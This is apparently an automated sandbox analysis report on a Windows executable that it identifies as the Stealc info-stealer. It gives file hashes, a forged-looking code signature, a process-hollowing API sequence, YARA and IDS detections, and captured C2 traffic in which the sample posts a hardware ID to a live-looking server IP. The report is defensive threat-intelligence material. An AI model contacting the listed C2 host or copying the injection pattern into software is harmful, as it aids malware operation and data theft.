          CODECCLOUD-AS-AP CodecCloud HK Limited HK | PM7K6PbAf0.exe | malicious | LummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, Stealc | 45.152.113.10
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Stealc | 45.152.113.10
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
          No context
          Process:C:\Users\user\Desktop\file.exe
          File Type:CSV text
          Category:dropped
          Size (bytes):226
          Entropy (8bit):5.360398796477698
          Encrypted:false
          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
          MD5:3A8957C6382192B71471BD14359D0B12
          SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
          SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
          SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
          Malicious:false
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.974395759081579
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          • Win32 Executable (generic) a (10002005/4) 49.97%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:file.exe
          File size:210'472 bytes
          MD5:032d49a1f22f5ec2d498fcf0f4076d91
          SHA1:e076ae8c8efe84d414932f84aca43617a31bf0e0
          SHA256:e45ef7fdd1a92c5ed40b3365a895623a112ee16444cf0ebe70619cf09d8628ca
          SHA512:23dffb6ad9d873896152efccaa89eccd2dec1314bbe8bdfd52540db0f7a13738aaa15b16bb36273d53469505b70771e7c16d29e629d7296df16c555f4533ec1c
          SSDEEP:3072:YvWtdf845OWGvjeDPkCyi3E6vuseKKT14Tug55rn43LMnF+eNQP5gFkI1LKYzEO:/tdU4whvjeDwepKT1QCLGQkNEO
          TLSH:66241318E3914F71E91E497829B0B234AEE2F1C27207DBF76099C099AE47785B13716F
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I..f............................^%... ...@....@.. ....................................`................................
          Icon Hash:00928e8e8686b000
          Entrypoint:0x43255e
          Entrypoint Section:.text
          Digitally signed:true
          Imagebase:0x400000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x66E1DA49 [Wed Sep 11 17:58:33 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
          Signature Valid:false
          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
          Signature Validation Error:The digital signature of the object did not verify
          Error Number:-2146869232
          Not Before, Not After
          • 13/01/2023 01:00:00 17/01/2026 00:59:59
          Subject Chain
          • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
          Version:3
          Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
          Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
          Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
          Serial:0997C56CAA59055394D9A9CDB8BEEB56
          Instruction
          jmp dword ptr [00402000h]
          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x32510 | 0x4b | .text
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34000 | 0x600 | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x31000 | 0x2628 |
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x36000 | 0xc | .reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x323d8 | 0x1c | .text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x2000 | 0x30564 | 0x30600 | 7ee7c8254495f27c66d67561bb8f5dc2 | False | 0.9917433785529716 | data | 7.99138693606094 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rsrc | 0x34000 | 0x600 | 0x600 | c368be690dfac09027b2fac67dad6285 | False | 0.4518229166666667 | data | 4.188787616791972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc | 0x36000 | 0xc | 0x200 | cc12ef0f3c0fbac92b8e76a40918fa2f | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          Name | RVA | Size | Type | ZLIB Complexity
          RT_VERSION | 0x340a0 | 0x36c | data | 0.454337899543379
          RT_MANIFEST | 0x34410 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | 0.5469387755102041
          DLL | Import
          mscoree.dll | _CorExeMain
          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
          2024-09-11T20:39:03.632416+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49707 | 45.152.113.10 | 80 | TCP
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Sep 11, 2024 20:39:02.764170885 CEST | 49707 | 80 | 192.168.2.5 | 45.152.113.10
          Sep 11, 2024 20:39:02.910203934 CEST | 80 | 49707 | 45.152.113.10 | 192.168.2.5
          Sep 11, 2024 20:39:02.910306931 CEST | 49707 | 80 | 192.168.2.5 | 45.152.113.10
          Sep 11, 2024 20:39:02.910475969 CEST | 49707 | 80 | 192.168.2.5 | 45.152.113.10
          Sep 11, 2024 20:39:02.915282965 CEST | 80 | 49707 | 45.152.113.10 | 192.168.2.5
          Sep 11, 2024 20:39:03.460450888 CEST | 80 | 49707 | 45.152.113.10 | 192.168.2.5
          Sep 11, 2024 20:39:03.460691929 CEST | 49707 | 80 | 192.168.2.5 | 45.152.113.10
          Sep 11, 2024 20:39:03.463449001 CEST | 49707 | 80 | 192.168.2.5 | 45.152.113.10
          Sep 11, 2024 20:39:03.468513966 CEST | 80 | 49707 | 45.152.113.10 | 192.168.2.5
          Sep 11, 2024 20:39:03.632316113 CEST | 80 | 49707 | 45.152.113.10 | 192.168.2.5
          Sep 11, 2024 20:39:03.632416010 CEST | 49707 | 80 | 192.168.2.5 | 45.152.113.10
          Sep 11, 2024 20:39:04.891096115 CEST | 49707 | 80 | 192.168.2.5 | 45.152.113.10
          • 45.152.113.10
          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.5 | 49707 | 45.152.113.10 | 80 | 5972 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Timestamp | Bytes transferred | Direction | Data
          Sep 11, 2024 20:39:02.910475969 CEST | 88 | OUT | GET / HTTP/1.1
          Host: 45.152.113.10
          Connection: Keep-Alive
          Cache-Control: no-cache
          Sep 11, 2024 20:39:03.460450888 CEST | 203 | IN | HTTP/1.1 200 OK
          Date: Wed, 11 Sep 2024 18:39:03 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Sep 11, 2024 20:39:03.463449001 CEST | 410 | OUT | POST /92335b4816f77e90.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJE
          Host: 45.152.113.10
          Content-Length: 210
          Connection: Keep-Alive
          Cache-Control: no-cache
          Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 39 32 39 44 44 44 30 41 32 45 33 34 34 31 30 34 31 38 31 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 79 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a
          Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="hwid"0C929DDD0A2E3441041814------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="build"cry------IECAFHDBGHJKFIDHJJJE--
          Sep 11, 2024 20:39:03.632316113 CEST | 210 | IN | HTTP/1.1 200 OK
          Date: Wed, 11 Sep 2024 18:39:03 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 8
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Data Raw: 59 6d 78 76 59 32 73 3d
          Data Ascii: YmxvY2s=



          Target ID:0
          Start time:14:39:00
          Start date:11/09/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe"
          Imagebase:0x5e0000
          File size:210'472 bytes
          MD5 hash:032D49A1F22F5EC2D498FCF0F4076D91
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:14:39:00
          Start date:11/09/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:14:39:01
          Start date:11/09/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0x6d0000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:high
          Has exited:true


            Execution Graph

            Execution Coverage:41.5%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:16.2%
            Total number of Nodes:37
            Total number of Limit Nodes:1

            Callgraph

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02A32598
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A325AB
            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02A325C9
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02A325ED
            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02A32618
            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02A32670
            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02A326BB
            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02A326F9
            • Wow64SetThreadContext.KERNEL32(?,?), ref: 02A32735
            • ResumeThread.KERNELBASE(?), ref: 02A32744
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2061859383.0000000002A32000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A32000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2a32000_file.jbxd
            Similarity
            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
            • String ID: GetP$Load$aryA$ress
            • API String ID: 2687962208-977067982
            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
            • Instruction ID: f4b00fda35838ce0c0f4eddf041cf45034fadab8671a1e957758a54bd24598a2
            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
            • Instruction Fuzzy Hash: 00B1D47664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA518B94

            Control-flow Graph

            APIs
            • VirtualProtectEx.KERNELBASE(?,03A33594,00000040,?,?), ref: 028D0EC4
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 9f859e1efa17665fef6d0e68863a2ecd127100ccd33f5606e3aa945df1b1460a
            • Instruction ID: b37ed97ad7d0ed60d753f1d162836b794b4b389ed6fef1d51a7058330835c020
            • Opcode Fuzzy Hash: 9f859e1efa17665fef6d0e68863a2ecd127100ccd33f5606e3aa945df1b1460a
            • Instruction Fuzzy Hash: 64C1A378A142598FCB01CFA8C880AADFFF1FF49315F548599D858EB356C374A845CB90

            Control-flow Graph

            APIs
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 028D0F99
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: CreateThread
            • String ID:
            • API String ID: 2422867632-0
            • Opcode ID: 1671b99f277bd33e3ff7c63abf12e8eb194ef75a500bc4620daff4f2a6dc7a7a
            • Instruction ID: 0a8520ea462ac27dff83784d2ecc7d526240ee6152ab654528455d0a1542716c
            • Opcode Fuzzy Hash: 1671b99f277bd33e3ff7c63abf12e8eb194ef75a500bc4620daff4f2a6dc7a7a
            • Instruction Fuzzy Hash: AD21F0B9D002499FCB10CF9AD984ADEBBF4FB48310F20842AE919E7350D374A954CFA5

            Control-flow Graph

            APIs
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,?), ref: 028D0F99
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: CreateThread
            • String ID:
            • API String ID: 2422867632-0
            • Opcode ID: 1fc2f611cc5e88127c78f8260f23eaef5be5bf67de715cfadb684b859e373c85
            • Instruction ID: 83810e996bbea881db23c32819a4ae57a87040181864af7239cc459094866c33
            • Opcode Fuzzy Hash: 1fc2f611cc5e88127c78f8260f23eaef5be5bf67de715cfadb684b859e373c85
            • Instruction Fuzzy Hash: 6C21F2B5D012499FCB10CF9AD984ADEBBF4FB49310F20842AE919A7350D375A954CFA1

            Control-flow Graph

            APIs
            • VirtualProtectEx.KERNELBASE(?,03A33594,00000040,?,?), ref: 028D0EC4
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 603c8cb067e3212b85e698a5d1a283aed4669cb1d3ea436121beee466f89fb55
            • Instruction ID: 08fd07131433540325ef617244ddfa24532a8a94a9c80a0be8bcbf7e4f6bd6cc
            • Opcode Fuzzy Hash: 603c8cb067e3212b85e698a5d1a283aed4669cb1d3ea436121beee466f89fb55
            • Instruction Fuzzy Hash: 822145B5C15259AFCB00DFAAD884ADEFFB4FF49310F10815AE918AB210C374A518CFA5

            Control-flow Graph

            APIs
            • VirtualProtectEx.KERNELBASE(?,03A33594,00000040,?,?), ref: 028D0EC4
            Memory Dump Source
            • Source File: 00000000.00000002.2061640163.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_28d0000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: ef0a84844b402f6d8fa13c80a555d9041561fd734a0afcbecc5a8eb6925b464e
            • Instruction ID: 69f3d486591e3fe62cf73531bebd2e1017175aa3dda0560414cf1579e07c095b
            • Opcode Fuzzy Hash: ef0a84844b402f6d8fa13c80a555d9041561fd734a0afcbecc5a8eb6925b464e
            • Instruction Fuzzy Hash: E421E3B5D1125DEFCB10DF9AD984ADEFBB4FB48310F108119E918A7210C375A954CFA5

            Execution Graph

            Execution Coverage:12.3%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0.7%
            Total number of Nodes:1508
            Total number of Limit Nodes:3
            • Execution graph image not rendered; the node/edge dump is omitted. APIs and library symbols referenced by nodes in the dump: GetComputerNameA, GetUserNameA, GetSystemInfo, GetUserDefaultLCID, VirtualAllocExNuma, VirtualAlloc, GlobalMemoryStatusEx, GetPEB, LoadLibraryA, GetVolumeInformationA, ExitProcess, InternetCrackUrlA, strtok_s, memcpy, memset, memcmp, malloc, strncpy, __aulldiv, ??2@YAPAXI, moneypunct
40a5e1 13993 414c70 7 API calls 13991->13993 13992 40a625 13992->13973 13993->13992 13995->13991 13995->13992 14016 409e60 13995->14016 13999 40ad86 13996->13999 13997 414c70 7 API calls 13998 40b039 13997->13998 13998->13973 13999->13997 13999->13998 14005 40b386 14000->14005 14001 40b817 14002 414c70 7 API calls 14001->14002 14003 40b86f 14001->14003 14002->14003 14003->13973 14004 409e60 2 API calls 14004->14005 14005->14001 14005->14003 14005->14004 14011 40b8f6 14006->14011 14007 409e60 2 API calls 14007->14011 14008 40bbda 14009 414c70 7 API calls 14008->14009 14010 40bc32 14008->14010 14009->14010 14010->13973 14011->14007 14011->14008 14011->14010 14013 40b0c6 14012->14013 14014 414c70 7 API calls 14013->14014 14015 40b2fd 14013->14015 14014->14015 14015->13973 14017 409e70 memcmp 14016->14017 14020 409f04 14016->14020 14018 409e8c 14017->14018 14017->14020 14019 409ea6 memset 14018->14019 14018->14020 14019->14020 14020->13995 14023 40e28d 14021->14023 14022 40e2f1 14022->13985 14023->14022 14024 40dc50 7 API calls 14023->14024 14024->14023 14026 41272b 14025->14026 14027 4121e6 14025->14027 14026->13935 14053 4060f0 14027->14053 14029 412671 14030 4060f0 4 API calls 14029->14030 14031 412698 14030->14031 14032 4060f0 4 API calls 14031->14032 14033 4126bc 14032->14033 14034 4060f0 4 API calls 14033->14034 14035 4126e3 14034->14035 14036 4060f0 4 API calls 14035->14036 14037 412707 14036->14037 14038 4060f0 4 API calls 14037->14038 14038->14026 14043 40d8d6 14039->14043 14040 40d93a 14040->13937 14043->14040 14046 40d8c0 11 API calls 14043->14046 14057 40cd30 14043->14057 14063 40d240 14043->14063 14067 40c7d0 14043->14067 14075 40d5c0 14043->14075 14046->14043 14051 40f506 14047->14051 14048 40f56d 14048->13939 14049 40f4f0 8 API calls 14049->14051 14051->14048 14051->14049 14079 418f70 14051->14079 14083 40f2e0 14051->14083 14054 406109 14053->14054 14055 404800 4 API calls 14054->14055 14056 406115 moneypunct 14055->14056 14056->14029 14060 40cd46 
14057->14060 14058 40d1c0 memset 14059 40d1d1 14058->14059 14059->14043 14060->14058 14060->14059 14061 414c70 7 API calls 14060->14061 14062 40d1af 14061->14062 14062->14058 14066 40d256 14063->14066 14064 40d527 14064->14043 14065 414c70 7 API calls 14065->14064 14066->14064 14066->14065 14069 40c7e4 14067->14069 14068 40ccbf 14068->14043 14069->14068 14070 40c8ee ??2@YAPAXI 14069->14070 14073 40c91f 14070->14073 14071 40cc7b 14072 414c70 7 API calls 14071->14072 14072->14068 14073->14071 14074 40c660 memset memcpy 14073->14074 14074->14073 14076 40d5d6 14075->14076 14077 40d82e 14076->14077 14078 414c70 7 API calls 14076->14078 14077->14043 14078->14077 14087 41d220 14079->14087 14082 418fa3 14082->14051 14085 40f2ff 14083->14085 14084 40f493 14084->14051 14085->14084 14089 40f140 14085->14089 14088 418f7d memset 14087->14088 14088->14082 14090 40f153 14089->14090 14092 40f27c 14090->14092 14093 40eb60 14090->14093 14092->14084 14095 40eb71 14093->14095 14094 40ebaa 14094->14092 14095->14094 14096 414c70 7 API calls 14095->14096 14097 40eb60 7 API calls 14095->14097 14096->14095 14097->14095 14098->13744 14100 401726 moneypunct 14099->14100 14101 401972 14100->14101 14102 414c70 7 API calls 14100->14102 14101->13752 14102->14100 14104 401344 14103->14104 14105 414c70 7 API calls 14104->14105 14106 4014d2 14104->14106 14108 40152a 14104->14108 14105->14106 14107 40150b memset 14106->14107 14107->14108 14108->13751 14109->13756 14117 41a4a0 14110->14117 14112 4137ba strtok_s 14114 4137ce 14112->14114 14113 413842 moneypunct 14113->13762 14114->14113 14116 413857 strtok_s 14114->14116 14118 4133c0 14114->14118 14116->14114 14117->14112 14120 4133e2 moneypunct __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14118->14120 14119 413419 14119->14114 14120->14119 14121 4133c0 7 API calls 14120->14121 14122 414c70 7 API calls 14120->14122 14121->14120 14122->14120 14123->13766 14127 412956 14124->14127 14125 412cf5 14131 4060f0 4 API calls 14125->14131 14126 412b57 14132 
4060f0 4 API calls 14126->14132 14127->14125 14127->14126 14128 412ea8 14127->14128 14129 412c6a 14127->14129 14130 4060f0 4 API calls 14128->14130 14129->13770 14130->14129 14131->14129 14132->14129 14135 4139d9 moneypunct 14133->14135 14134 4139ff moneypunct 14134->13774 14135->14134 14136 414c70 7 API calls 14135->14136 14136->14135 14138 416d9e 14137->14138 14141 416b70 ??_U@YAPAXI 14138->14141 14140 416dad 14140->13788 14156 41a110 14141->14156 14143 416bb1 OpenProcess 14144 416be8 allocator 14143->14144 14155 416bcb 14143->14155 14145 416bf5 memset 14144->14145 14146 416d4e ??_V@YAXPAX 14144->14146 14148 416c65 14144->14148 14149 416c79 ReadProcessMemory 14144->14149 14152 4080a0 memcpy codecvt 14144->14152 14153 416d15 14144->14153 14165 416dc0 14144->14165 14171 416600 14144->14171 14158 4169a0 strlen ??_U@YAPAXI 14145->14158 14146->14155 14148->14146 14149->14144 14152->14144 14185 4080a0 14153->14185 14155->14140 14157 41a120 14156->14157 14157->14143 14188 416670 strlen 14158->14188 14160 416a24 VirtualQueryEx 14161 416b49 ??_V@YAXPAX 14160->14161 14162 416a0c 14160->14162 14164 416aa8 14161->14164 14162->14160 14163 416880 ReadProcessMemory 14162->14163 14162->14164 14163->14162 14164->14144 14166 416dd1 allocator 14165->14166 14192 4082d0 14166->14192 14168 416de5 14196 4082a0 14168->14196 14172 416dc0 9 API calls 14171->14172 14173 416613 14172->14173 14275 416e40 14173->14275 14176 41662f 14279 416e70 14176->14279 14177 41664e 14283 4095a0 14177->14283 14182 4080a0 codecvt memcpy 14184 416649 14182->14184 14183 4080a0 codecvt memcpy 14183->14184 14184->14144 14186 4082d0 codecvt memcpy 14185->14186 14187 4080b3 task 14186->14187 14187->14155 14189 4166a1 strlen 14188->14189 14190 416800 14189->14190 14191 4166b7 14189->14191 14190->14162 14191->14189 14193 4082e3 14192->14193 14195 4082e1 codecvt task 14192->14195 14193->14195 14201 407230 memcpy 14193->14201 14195->14168 14202 407210 strlen 14196->14202 14198 4082b0 14203 408660 14198->14203 14200 
4082c0 14200->14144 14201->14195 14202->14198 14204 408673 14203->14204 14205 40869a 14204->14205 14206 40867a allocator 14204->14206 14225 408d10 14205->14225 14212 408c50 14206->14212 14209 408698 codecvt 14209->14200 14210 4086a8 allocator 14210->14209 14234 407230 memcpy 14210->14234 14213 408c61 allocator 14212->14213 14215 408c6e allocator 14213->14215 14235 408720 14213->14235 14216 408c92 14215->14216 14217 408cb7 14215->14217 14238 408f80 14216->14238 14218 408d10 allocator 7 API calls 14217->14218 14223 408cc5 allocator 14218->14223 14220 408ca7 14221 408f80 allocator 6 API calls 14220->14221 14222 408cb5 codecvt 14221->14222 14222->14209 14223->14222 14244 407230 memcpy 14223->14244 14226 408d21 allocator 14225->14226 14227 408d2e 14226->14227 14253 408df0 14226->14253 14229 408d39 14227->14229 14232 408d4e 14227->14232 14256 409050 14229->14256 14231 408d4c codecvt 14231->14210 14232->14231 14233 4082d0 codecvt memcpy 14232->14233 14233->14231 14234->14209 14245 41d320 14235->14245 14239 408f94 14238->14239 14241 408f9c allocator 14238->14241 14240 408720 allocator 5 API calls 14239->14240 14240->14241 14243 408fe9 codecvt 14241->14243 14252 407250 memmove 14241->14252 14243->14220 14244->14222 14246 41a539 std::exception::exception strlen malloc strcpy_s 14245->14246 14247 41d33a 14246->14247 14248 41d394 __CxxThrowException@8 RaiseException 14247->14248 14249 41d34f 14248->14249 14250 41a5c7 std::exception::exception strlen malloc strcpy_s free 14249->14250 14251 408731 14250->14251 14251->14215 14252->14243 14264 41d2d3 14253->14264 14258 409086 allocator 14256->14258 14271 409220 14258->14271 14259 409180 14260 4082d0 codecvt memcpy 14259->14260 14262 40918f codecvt 14260->14262 14261 4090fe allocator 14261->14259 14274 407230 memcpy 14261->14274 14262->14231 14265 41a539 std::exception::exception strlen malloc strcpy_s 14264->14265 14266 41d2ed 14265->14266 14267 41d394 __CxxThrowException@8 RaiseException 14266->14267 14268 41d302 14267->14268 
14269 41a5c7 std::exception::exception strlen malloc strcpy_s free 14268->14269 14270 408e01 14269->14270 14270->14227 14272 409440 allocator 5 API calls 14271->14272 14273 409232 14272->14273 14273->14261 14274->14259 14276 416e4f allocator 14275->14276 14289 416f00 14276->14289 14278 416621 14278->14176 14278->14177 14280 416e85 14279->14280 14294 416eb0 14280->14294 14284 4095b8 allocator 14283->14284 14285 4082d0 codecvt memcpy 14284->14285 14286 4095cc 14285->14286 14287 408c50 allocator 8 API calls 14286->14287 14288 4095dc 14287->14288 14288->14183 14290 416f5e allocator 14289->14290 14292 416f14 allocator 14289->14292 14290->14278 14292->14290 14293 4165e0 memchr 14292->14293 14293->14292 14295 416ec5 allocator 14294->14295 14296 4082d0 codecvt memcpy 14295->14296 14297 416ed9 14296->14297 14298 408c50 allocator 8 API calls 14297->14298 14299 416641 14298->14299 14299->14182 14303 414066 14300->14303 14301 4140b2 moneypunct 14301->13794 14302 414179 moneypunct 14302->14301 14305 414c70 7 API calls 14302->14305 14303->14301 14303->14302 14306 413d90 memset memset 14303->14306 14305->14301 14307 413dea 14306->14307 14308 409d30 2 API calls 14307->14308 14311 413f7e moneypunct 14307->14311 14309 413ea0 moneypunct 14308->14309 14310 409e60 2 API calls 14309->14310 14309->14311 14310->14311 14311->14303 14315 414412 moneypunct 14312->14315 14313 414438 14313->13798 14314 4143f0 7 API calls 14314->14315 14315->14313 14315->14314 14316 414c70 7 API calls 14315->14316 14316->14315 14322 407310 14317->14322 14320 407740 14320->13830 14321 40762b 14337 408160 14321->14337 14323 40731d 14322->14323 14324 40732e memset 14323->14324 14336 407380 14324->14336 14325 407580 14362 408120 14325->14362 14328 408160 task memcpy 14329 40759a 14328->14329 14329->14321 14334 4080c0 9 API calls 14334->14336 14335 409270 strcpy_s 14335->14336 14336->14325 14336->14334 